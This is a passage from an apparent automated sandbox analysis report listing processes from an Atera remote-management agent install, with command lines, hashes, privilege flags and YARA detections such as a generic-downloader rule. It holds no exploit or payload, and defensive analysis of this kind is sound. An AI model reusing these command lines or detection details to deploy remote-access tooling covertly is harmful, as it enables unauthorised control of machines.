                                                                                                                                                                                                                                        Start time:12:45:30
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                        Commandline:rundll32.exe "C:\Windows\Installer\MSI6CA1.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_4484296 32 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiEnd
                                                                                                                                                                                                                                        Imagebase:0x90000
                                                                                                                                                                                                                                        File size:61'440 bytes
                                                                                                                                                                                                                                        MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000013.00000003.1990755362.00000000042A3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000013.00000002.2046712886.00000000044E7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000013.00000002.2046712886.0000000004441000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:20
                                                                                                                                                                                                                                        Start time:12:45:46
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "b2e2e8e1-1aa5-45e8-a3fe-897e9eed0f74" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000OgujIIAR
                                                                                                                                                                                                                                        Imagebase:0x167d1430000
                                                                                                                                                                                                                                        File size:178'728 bytes
                                                                                                                                                                                                                                        MD5 hash:83FD950ED584099A4125EFBA77E26BAA
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.2185698631.00000167D16B0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.2188999803.00000167EA688000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.2185698631.00000167D173D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.2186817722.00000167D1D97000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.2186817722.00000167D1D51000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.2185698631.00000167D16F4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.2185698631.00000167D16BC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.2186664381.00000167D1910000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.2186817722.00000167D1E41000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.2186817722.00000167D1DC3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.2185698631.00000167D16FA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.2186817722.00000167D1DD3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000002.2186532729.00000167D18B2000.00000002.00000001.01000000.00000018.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000014.00000000.2149423855.00000167D1432000.00000002.00000001.01000000.00000016.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe, Author: Joe Security
                                                                                                                                                                                                                                        Antivirus matches:
                                                                                                                                                                                                                                        • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:21
                                                                                                                                                                                                                                        Start time:12:45:46
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "7fdf9479-5622-4845-acad-9b745ab412f6" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000OgujIIAR
                                                                                                                                                                                                                                        Imagebase:0x280ba760000
                                                                                                                                                                                                                                        File size:178'728 bytes
                                                                                                                                                                                                                                        MD5 hash:83FD950ED584099A4125EFBA77E26BAA
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000015.00000002.2185697606.00000280BA970000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000015.00000002.2185697606.00000280BA9AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000015.00000002.2186704723.00000280BB183000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000015.00000002.2185697606.00000280BA9AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000015.00000002.2186704723.00000280BB111000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000015.00000002.2186704723.00000280BB193000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000015.00000002.2186704723.00000280BB201000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000015.00000002.2185697606.00000280BA9F5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000015.00000002.2185591000.00000280BA930000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000015.00000002.2185697606.00000280BA978000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:22
                                                                                                                                                                                                                                        Start time:12:45:46
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:23
                                                                                                                                                                                                                                        Start time:12:45:46
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:24
                                                                                                                                                                                                                                        Start time:12:45:50
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "ccc76317-d528-48be-b707-c3302c03bc5e" agent-api.atera.com/Production 443 or8ixLi90Mf "identified" 001Q300000OgujIIAR
                                                                                                                                                                                                                                        Imagebase:0x12caefd0000
                                                                                                                                                                                                                                        File size:178'728 bytes
                                                                                                                                                                                                                                        MD5 hash:83FD950ED584099A4125EFBA77E26BAA
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2205583773.0000012CAFA93000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2204369786.0000012CAF230000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2205583773.0000012CAFA21000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2205416152.0000012CAF4A0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2204369786.0000012CAF26B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2204369786.0000012CAF2B8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2204369786.0000012CAF239000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 00000018.00000002.2205583773.0000012CAFAA3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:25
                                                                                                                                                                                                                                        Start time:12:45:50
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:26
                                                                                                                                                                                                                                        Start time:12:45:51
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe"
                                                                                                                                                                                                                                        Imagebase:0x21b51630000
                                                                                                                                                                                                                                        File size:145'968 bytes
                                                                                                                                                                                                                                        MD5 hash:477293F80461713D51A98A24023D45E8
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2816629668.0000021B516E0000.00000004.00000020.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2911371890.0000021B6A7E7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2915185997.0000021B6ABC1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2825307729.0000021B52A88000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2915185997.0000021B6ABEF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2915185997.0000021B6AC04000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2825307729.0000021B52848000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2816995598.0000021B518FD000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2825307729.0000021B52841000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2915185997.0000021B6AB8E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2911371890.0000021B6A7C8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2825307729.0000021B5285B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2825307729.0000021B5263C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2809923548.0000003296F15000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2825307729.0000021B5205B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2915185997.0000021B6AC34000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2825307729.0000021B52A7F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2825307729.0000021B526ED000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2825307729.0000021B526C7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2816995598.0000021B51848000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2825307729.0000021B52785000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2825307729.0000021B527FF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2825307729.0000021B529A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2816995598.0000021B518C4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2825307729.0000021B52111000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2825307729.0000021B522F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2825307729.0000021B5287E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2825307729.0000021B52A08000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2816995598.0000021B51840000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2825307729.0000021B5220E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2825307729.0000021B5279C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2825307729.0000021B5241A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2825307729.0000021B51FF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2825307729.0000021B5251C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2821992200.0000021B51AF0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001A.00000002.2915185997.0000021B6AB60000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:27
                                                                                                                                                                                                                                        Start time:12:45:51
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\sc.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                                                                                                                                                                                                                        Imagebase:0x7ff614260000
                                                                                                                                                                                                                                        File size:72'192 bytes
                                                                                                                                                                                                                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:28
                                                                                                                                                                                                                                        Start time:12:45:51
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                        Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:29
                                                                                                                                                                                                                                        Start time:12:45:53
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe
                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                        Commandline:"C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" ef8472c8-8ede-4877-a4a2-21e52a229933 "43d0d764-ddb0-4812-a25c-540c7752fdf7" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo fromGui" 001Q300000OgujIIAR
                                                                                                                                                                                                                                        Imagebase:0x125cb2f0000
                                                                                                                                                                                                                                        File size:178'728 bytes
                                                                                                                                                                                                                                        MD5 hash:83FD950ED584099A4125EFBA77E26BAA
                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                        Yara matches:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2469526724.00000125E46AE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2459960372.00000125CBF84000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2468014971.00000125E45E0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2459960372.00000125CBF56000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2458294221.00000125CB57B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2459960372.00000125CBD11000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2459960372.00000125CC017000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2459643421.00000125CB700000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2459960372.00000125CBEBF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2459960372.00000125CBF59000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2472333825.00000125E48C9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2458294221.00000125CB5C4000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2458294221.00000125CB540000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2459960372.00000125CBF87000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: 0000001D.00000002.2459960372.00000125CBDA5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                        Target ID:30
                                                                                                                                                                                                                                        Start time:12:45:53
                                                                                                                                                                                                                                        Start date:17/12/2024
                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
